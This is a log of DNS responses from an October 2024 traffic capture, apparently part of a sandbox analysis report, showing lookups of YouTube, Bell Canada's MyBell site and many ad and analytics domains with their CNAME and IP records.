                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.848045111 CET1.1.1.1192.168.2.90x4be9No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.848045111 CET1.1.1.1192.168.2.90x4be9No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.852180004 CET1.1.1.1192.168.2.90x7f9eNo error (0)02179915.akstat.iowildcard46.akstat.io.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.223716021 CET1.1.1.1192.168.2.90x2c79No error (0)s.amazon-adsystem.com98.82.157.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.224802017 CET1.1.1.1192.168.2.90x8230No error (0)googleads.g.doubleclick.net142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.224874020 CET1.1.1.1192.168.2.90x964No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.245199919 CET1.1.1.1192.168.2.90xa437No error (0)analytics-fe.digital-cloud.medallia.cadigital.lb.can.medallia.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.245199919 CET1.1.1.1192.168.2.90xa437No error (0)digital.lb.can.medallia.ca147.75.178.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.254905939 CET1.1.1.1192.168.2.90xc22eNo error (0)analytics-fe.digital-cloud.medallia.cadigital.lb.can.medallia.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.348608017 CET1.1.1.1192.168.2.90x5718No error (0)data1.bell.cabell.ca.ssl.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.348608017 CET1.1.1.1192.168.2.90x5718No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.348608017 CET1.1.1.1192.168.2.90x5718No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.348608017 CET1.1.1.1192.168.2.90x5718No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:49.474807978 CET1.1.1.1192.168.2.90x9060No error (0)data1.bell.cabell.ca.ssl.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266334057 CET1.1.1.1192.168.2.90x53f4No error (0)trial-eum-clienttons-s.akamaihd.nettrial-eum.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266334057 CET1.1.1.1192.168.2.90x53f4No error (0)trial-eum.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266542912 CET1.1.1.1192.168.2.90x541No error (0)trial-eum-clienttons-s.akamaihd.nettrial-eum.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266542912 CET1.1.1.1192.168.2.90x541No error (0)trial-eum.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266624928 CET1.1.1.1192.168.2.90x9d38No error (0)trial-eum-clientnsv4-s.akamaihd.neta248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:51.266782999 CET1.1.1.1192.168.2.90xee92No error (0)trial-eum-clientnsv4-s.akamaihd.neta248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.440049887 CET1.1.1.1192.168.2.90xc3e7No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netvx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.440049887 CET1.1.1.1192.168.2.90xc3e7No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.coma248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.444638968 CET1.1.1.1192.168.2.90xaac3No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netvx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.444638968 CET1.1.1.1192.168.2.90xaac3No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.coma248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.513866901 CET1.1.1.1192.168.2.90x5869No error (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.513866901 CET1.1.1.1192.168.2.90x5869No error (0)173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.517400026 CET1.1.1.1192.168.2.90x8544No error (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:52.517400026 CET1.1.1.1192.168.2.90x8544No error (0)173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.345473051 CET1.1.1.1192.168.2.90x7612No error (0)udc-neb.kampyle.comcooladata.kampyle.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.345473051 CET1.1.1.1192.168.2.90x7612No error (0)cooladata.kampyle.com35.241.45.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.346052885 CET1.1.1.1192.168.2.90x7495No error (0)udc-neb.kampyle.comcooladata.kampyle.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.767981052 CET1.1.1.1192.168.2.90x922dNo error (0)siteimproveanalytics.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.767981052 CET1.1.1.1192.168.2.90x922dNo error (0)siteimproveanalytics.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.768449068 CET1.1.1.1192.168.2.90xa4dcNo error (0)siteimproveanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.768883944 CET1.1.1.1192.168.2.90x9a19No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.770106077 CET1.1.1.1192.168.2.90xc437No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.770106077 CET1.1.1.1192.168.2.90xc437No error (0)platform.twitter.map.fastly.net199.232.188.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.893887043 CET1.1.1.1192.168.2.90xa19bNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.893887043 CET1.1.1.1192.168.2.90xa19bNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.894560099 CET1.1.1.1192.168.2.90x3b41No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.894560099 CET1.1.1.1192.168.2.90x3b41No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.894572020 CET1.1.1.1192.168.2.90xd172No error (0)sc-static.net143.204.207.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.912925005 CET1.1.1.1192.168.2.90x7854No error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.912925005 CET1.1.1.1192.168.2.90x7854No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:53.912925005 CET1.1.1.1192.168.2.90x7854No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:54.805922985 CET1.1.1.1192.168.2.90x3f22No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:54.806443930 CET1.1.1.1192.168.2.90x36cdNo error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.302831888 CET1.1.1.1192.168.2.90xb817No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.302845001 CET1.1.1.1192.168.2.90xff9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.944689035 CET1.1.1.1192.168.2.90xced3No error (0)mybell.bell.camybell-on-priority.gdns.bell.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:55.944689035 CET1.1.1.1192.168.2.90xced3No error (0)mybell-on-priority.gdns.bell.ca206.47.98.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:56.055130005 CET1.1.1.1192.168.2.90xa3e7Server failure (2)mybell.bell.canonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.445734024 CET1.1.1.1192.168.2.90x6423No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.445734024 CET1.1.1.1192.168.2.90x6423No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.445930958 CET1.1.1.1192.168.2.90xa7eNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:00.445930958 CET1.1.1.1192.168.2.90xa7eNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.862318993 CET1.1.1.1192.168.2.90x789fNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.862318993 CET1.1.1.1192.168.2.90x789fNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.862318993 CET1.1.1.1192.168.2.90x789fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.862318993 CET1.1.1.1192.168.2.90x789fNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.862318993 CET1.1.1.1192.168.2.90x789fNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.863029957 CET1.1.1.1192.168.2.90xe23cNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:03.863029957 CET1.1.1.1192.168.2.90xe23cNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.964700937 CET1.1.1.1192.168.2.90xb2adNo error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.964700937 CET1.1.1.1192.168.2.90xb2adNo error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.964888096 CET1.1.1.1192.168.2.90x8651No error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:04.964888096 CET1.1.1.1192.168.2.90x8651No error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.175204992 CET1.1.1.1192.168.2.90xfcacNo error (0)siteimproveanalytics.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.175204992 CET1.1.1.1192.168.2.90xfcacNo error (0)siteimproveanalytics.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.175254107 CET1.1.1.1192.168.2.90xd52fNo error (0)siteimproveanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.193052053 CET1.1.1.1192.168.2.90x15c1No error (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.193052053 CET1.1.1.1192.168.2.90x15c1No error (0)173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.198421955 CET1.1.1.1192.168.2.90xb49cNo error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netvx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.198421955 CET1.1.1.1192.168.2.90xb49cNo error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.coma248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.206140995 CET1.1.1.1192.168.2.90x6a4dNo error (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.206140995 CET1.1.1.1192.168.2.90x6a4dNo error (0)173.254.250.77_s-2.16.164.104_ts-1730380372.cname.clienttons.coma1024.dscg.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.239483118 CET1.1.1.1192.168.2.90xfbf7No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.239483118 CET1.1.1.1192.168.2.90xfbf7No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240375996 CET1.1.1.1192.168.2.90x98abNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240375996 CET1.1.1.1192.168.2.90x98abNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240655899 CET1.1.1.1192.168.2.90x4446No error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240655899 CET1.1.1.1192.168.2.90x4446No error (0)ax-0001.ax-dc-msedge.net150.171.29.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240655899 CET1.1.1.1192.168.2.90x4446No error (0)ax-0001.ax-dc-msedge.net150.171.30.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240895987 CET1.1.1.1192.168.2.90x3025No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.240895987 CET1.1.1.1192.168.2.90x3025No error (0)platform.twitter.map.fastly.net199.232.188.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.242412090 CET1.1.1.1192.168.2.90x41d1No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.365474939 CET1.1.1.1192.168.2.90xcc70No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netvx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.365474939 CET1.1.1.1192.168.2.90xcc70No error (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2.ipv4-only.cname.clienttons.coma248.b.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.476077080 CET1.1.1.1192.168.2.90xe848No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.476339102 CET1.1.1.1192.168.2.90xc4b7No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693212986 CET1.1.1.1192.168.2.90xe95No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693212986 CET1.1.1.1192.168.2.90xe95No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693224907 CET1.1.1.1192.168.2.90x6ff2No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693224907 CET1.1.1.1192.168.2.90x6ff2No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693233967 CET1.1.1.1192.168.2.90x30e1No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.693233967 CET1.1.1.1192.168.2.90x30e1No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.700519085 CET1.1.1.1192.168.2.90xc3dfNo error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.700519085 CET1.1.1.1192.168.2.90xc3dfNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:08.085916042 CET1.1.1.1192.168.2.90xf405No error (0)mybell.bell.camybell-on-priority.gdns.bell.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:08.085916042 CET1.1.1.1192.168.2.90xf405No error (0)mybell-on-priority.gdns.bell.ca206.47.98.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:08.086823940 CET1.1.1.1192.168.2.90xd5e2Server failure (2)mybell.bell.canonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:08.406604052 CET1.1.1.1192.168.2.90x9127Server failure (2)mybell.bell.canonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.897072077 CET1.1.1.1192.168.2.90xd708No error (0)t.co172.66.0.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.898206949 CET1.1.1.1192.168.2.90xeb24No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.898206949 CET1.1.1.1192.168.2.90xeb24No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.898206949 CET1.1.1.1192.168.2.90xeb24No error (0)s.twitter.com104.244.42.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.898474932 CET1.1.1.1192.168.2.90x79e3No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.898474932 CET1.1.1.1192.168.2.90x79e3No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926943064 CET1.1.1.1192.168.2.90xb930No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926943064 CET1.1.1.1192.168.2.90xb930No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926943064 CET1.1.1.1192.168.2.90xb930No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926943064 CET1.1.1.1192.168.2.90xb930No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926943064 CET1.1.1.1192.168.2.90xb930No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926975012 CET1.1.1.1192.168.2.90xee83No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.926975012 CET1.1.1.1192.168.2.90xee83No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:13.004673004 CET1.1.1.1192.168.2.90x9a39No error (0)t.clarity.msclarity-ingest-eus2-c-sc.eastus2.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:13.004682064 CET1.1.1.1192.168.2.90xaf7cNo error (0)t.clarity.msclarity-ingest-eus2-c-sc.eastus2.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.527390957 CET1.1.1.1192.168.2.90x3eb2No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.527390957 CET1.1.1.1192.168.2.90x3eb2No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.527390957 CET1.1.1.1192.168.2.90x3eb2No error (0)s.twitter.com104.244.42.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.527692080 CET1.1.1.1192.168.2.90x981dNo error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
